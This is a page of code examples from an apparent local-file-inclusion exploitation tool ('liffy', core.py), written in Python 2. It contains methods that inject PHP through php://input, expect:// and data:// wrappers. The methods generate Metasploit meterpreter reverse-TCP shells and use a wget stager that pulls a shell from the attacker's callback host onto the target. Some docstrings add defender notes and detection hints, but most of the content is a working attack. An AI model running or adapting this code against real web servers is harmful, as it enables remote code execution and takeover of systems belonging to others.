        # `print t.red(...)(input_error)` form also calls the value t.red()
        # returns -- likely a TypeError; confirm.
        if self.cookies:
            f_cookies = format_cookies(self.cookies)
            try:
                input_request = requests.post(url,
                                              data=payload,
                                              cookies=f_cookies)
                if input_request.status_code != 200:
                    print t.red("[{0}] Unexpected HTTP Response ".format(
                        datetime.datetime.now()))
                    sys.exit(1)
                else:
                    sys.exit(0)
            except requests.HTTPError as input_error:
                print t.red("[{0}] HTTP Error ".format(
                    datetime.datetime.now()))(input_error)
                sys.exit(1)
        else:
            try:
                input_request = requests.post(url, data=payload)
                if input_request.status_code != 200:
                    print t.red("[{0}] Unexpected HTTP Response ".format(
                        datetime.datetime.now()))
                    sys.exit(1)
                else:
                    sys.exit(0)
            except requests.HTTPError as input_error:
                print t.red("[{0}] HTTP Error ".format(
                    datetime.datetime.now()))(input_error)
                sys.exit(1)
コード例 #28
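    def execute_input(self):
        """POST the payload to ``self.target`` with ``php://input`` appended.

        Prompts for the callback host and port, runs ``msfpayload`` to write
        ``/tmp/<shell>.php``, then posts either that file (``self.nostager``)
        or a ``wget`` one-liner as the request body.

        Defensive context: PHP honours ``php://input`` inside an include only
        when ``allow_url_include`` is enabled, and the wrapper name appears in
        the requested URL, so it can be matched in access logs.
        """

        # Arguments needed for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        print(t.green(" [*] ") + "Generating Data Wrapper")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # Generate PHP shell
        # NOTE(review): the prompt answers are interpolated unvalidated into a
        # string that is run with shell=True on the operator's own machine.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Handle Metasploit error codes
        if msf.returncode != 0:
            print(t.red(" [!] Error Generating MSF Payload "))
        else:
            print(t.green(" [*] ") + "Success!")
            print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))

        # Build php payload
        wrapper = "php://input"
        url = self.target + wrapper
        if self.nostager:
            # Context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)

        if self.nostager:
            raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
        else:
            # Assuming if there is a server running on port 8000 hosting from /tmp
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # Try block for actual attack
        try:
            dr = requests.post(url, data=payload)
            if dr.status_code != 200:
                print(t.red(" [*] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as input_error:
            print(t.red(" [*] HTTP Error ") + str(input_error))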
コード例 #29
ファイル: core.py プロジェクト: ksmaheshkumar/liffy
    def execute_expect(self):
        """Request ``self.target`` with an ``expect://`` wrapper that pipes PHP into ``php``.

        Obtains the callback host, port and shell name from ``msf_payload()``,
        builds an ``expect://echo "<php>" | php`` string (the generated file
        in no-stager mode, ``stager_payload`` otherwise), appends it to
        ``self.target`` and issues one GET, with cookies when
        ``self.cookies`` is set.

        Does not return normally once the request completes: it calls
        ``sys.exit(0)`` on HTTP 200 and ``sys.exit(1)`` on any other status
        or on ``requests.HTTPError``.

        Defender note: the ``expect://`` wrapper exists only when the PECL
        ``expect`` extension is installed, so this path is closed on a stock
        PHP build. The literal ``expect://`` in a request parameter is a
        straightforward detection signature.
        """

        lhost, lport, shell = msf_payload()

        # Payload is defined elsewhere; presumably this prepares the
        # Metasploit handler for the callback -- confirm against its source.
        handle = Payload(lhost, lport)
        handle.handler()
        """ Build payload """
        """ Handle staging """

        if self.nostager:
            print(
                t.cyan("[{0}] ".format(datetime.datetime.now())) +
                "No-Staged Selected!")
            # Read the generated PHP file, backslash-escape `"` and `$` so
            # the text survives inside the double-quoted echo argument, then
            # URL-encode it.
            payload_file = open("/tmp/{0}.php".format(shell), "r")
            payload = "expect://echo \""
            payload += quote_plus(payload_file.read().replace("\"",
                                                              "\\\"").replace(
                                                                  "$", "\\$"))
            payload += "\" | php"
            payload_file.close()
        else:
            # Staged mode: stager_payload (defined elsewhere) is inserted
            # as-is, without the escaping or URL-encoding used above.
            payload = "expect://echo \"" + stager_payload.format(
                lhost, shell) + "\" | php"
            print(
                t.cyan("[{0}] ".format(datetime.datetime.now())) +
                "Starting Web Server ... ")
            progressbar()
            try:
                # NOTE(review): communicate() waits for the child to exit,
                # so this call blocks until http_server.py terminates.
                p = subprocess.Popen(['python http_server.py'],
                                     shell=True,
                                     stdout=subprocess.PIPE)
                p.communicate()
            except OSError as os_error:
                # NOTE(review): under Python 2 this prints the result of
                # calling the string returned by t.red(...) with os_error;
                # unless that object is callable it raises TypeError instead
                # of reporting the error -- confirm what `t` returns.
                print(
                    t.red("[{0}] ".format(datetime.datetime.now()) +
                          "Process Error"))(os_error)

        lfi = self.target + payload

        raw_input(
            t.cyan("[{0}] ".format(datetime.datetime.now())) +
            "Press Enter To Continue When Your Metasploit Handler is Running ..."
        )

        # The two branches below differ only in passing cookies= to the GET.
        # NOTE(review): requests.get() raises HTTPError only through
        # raise_for_status(); connection failures and timeouts are other
        # RequestException subclasses and propagate uncaught here. No
        # timeout is set on either request.
        if self.cookies:
            f_cookies = format_cookies(self.cookies)
            try:
                r = requests.get(lfi, cookies=f_cookies)
                if r.status_code != 200:
                    print(
                        t.red("[{0}] Unexpected HTTP Response ".format(
                            datetime.datetime.now())))
                    sys.exit(1)
                else:
                    sys.exit(0)
            except requests.HTTPError as expect_error:
                # NOTE(review): same call-on-a-string pattern as the OSError
                # handler above; likely raises TypeError.
                print t.red("[{0}] HTTP Error ".format(
                    datetime.datetime.now()))(expect_error)
                sys.exit(1)
        else:
            try:
                r = requests.get(lfi)
                if r.status_code != 200:
                    print(
                        t.red("[{0}] Unexpected HTTP Response ".format(
                            datetime.datetime.now())))
                    sys.exit(1)
                else:
                    sys.exit(0)
            except requests.HTTPError as expect_error:
                print t.red("[{0}] HTTP Error ".format(
                    datetime.datetime.now()))(expect_error)
                sys.exit(1)
コード例 #30
ファイル: core.py プロジェクト: Yas3r/liffy
    def execute_data(self):
        """Request ``self.target`` with a base64 ``data://`` wrapper carrying PHP.

        Obtains the callback host, port and shell name from ``msf_payload()``,
        base64-encodes either the generated ``/tmp/<shell>.php`` file
        (``self.nostager`` set) or ``stager_payload``, wraps it as
        ``data://text/html;base64,<payload>``, appends that to
        ``self.target`` and issues one GET, with cookies when
        ``self.cookies`` is set.

        Calls ``sys.exit(0)`` on HTTP 200. A non-200 status exits with 1 in
        the cookie branch but only prints in the other branch, which then
        returns None.

        Defender note: PHP accepts ``data://`` in include()/require() only
        when ``allow_url_include`` is enabled; leaving it off (the default)
        and keeping request data out of include paths closes this path.
        ``data://text/html;base64,`` in a request parameter is a usable
        detection signature.
        """

        lhost, lport, shell = msf_payload()

        """ Build payload """
        """ Handle staging """

        if self.nostager:
            payload_file = open("/tmp/{0}.php".format(shell), "r")
            payload = payload_file.read()
            payload_file.close()
        else:
            payload = stager_payload.format(lhost, shell)

        # str.encode('base64') is a Python 2-only codec; its output includes
        # line breaks, which quote_plus then percent-encodes.
        encoded_payload = quote_plus(payload.encode('base64'))

        """ Build data wrapper """

        data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
        lfi = self.target + data_wrapper

        # Payload is defined elsewhere; presumably this prepares the
        # Metasploit handler for the callback -- confirm against its source.
        handle = Payload(lhost, lport)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Starting Web Server ... ")
            progressbar()
            try:
                # NOTE(review): communicate() waits for the child to exit,
                # so this call blocks until http_server.py terminates.
                p = subprocess.Popen(['python http_server.py'], shell=True, stdout=subprocess.PIPE)
                p.communicate()
            except OSError as os_error:
                # NOTE(review): under Python 2 this calls the string built by
                # t.red(...) with os_error before printing; unless that
                # object is callable it raises TypeError -- confirm.
                print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error"))(os_error)

        raw_input(t.red("[{0}] ".format(
            datetime.datetime.now())) + "Press Enter To Continue When Your Metasploit Handler is Running ...")

        """ LFI payload that downloads the shell with try block for actual
            attack """

        # NOTE(review): requests.get() raises HTTPError only through
        # raise_for_status(); connection failures and timeouts are other
        # RequestException subclasses and propagate uncaught from both
        # branches. No timeout is set on either request.
        if self.cookies:
            f_cookies = format_cookies(self.cookies)
            try:
                data_request = requests.get(lfi, cookies=f_cookies)
                if data_request.status_code != 200:
                    print(t.red("[{0}] ".format(datetime.datetime.now())) + "Unexpected HTTP Response ")
                    sys.exit(1)
                else:
                    sys.exit(0)
            except requests.HTTPError as data_error:
                # NOTE(review): same call-on-a-string pattern as the OSError
                # handler above; likely raises TypeError.
                print(t.red("[{0}] ".format(datetime.datetime.now())) + "HTTP Error")(data_error)
                sys.exit(1)
        else:
            try:
                data_request = requests.get(lfi)
                if data_request.status_code != 200:
                    # NOTE(review): unlike the cookie branch, there is no
                    # sys.exit(1) here, so the process exit status does not
                    # reflect the failure.
                    print(t.red("[{0}] ".format(datetime.datetime.now())) + "Unexpected HTTP Response ")
                else:
                    sys.exit(0)
            except requests.HTTPError as data_error:
                print(t.red("[{0}] ".format(datetime.datetime.now())) + "HTTP Error")(data_error)
                sys.exit(1)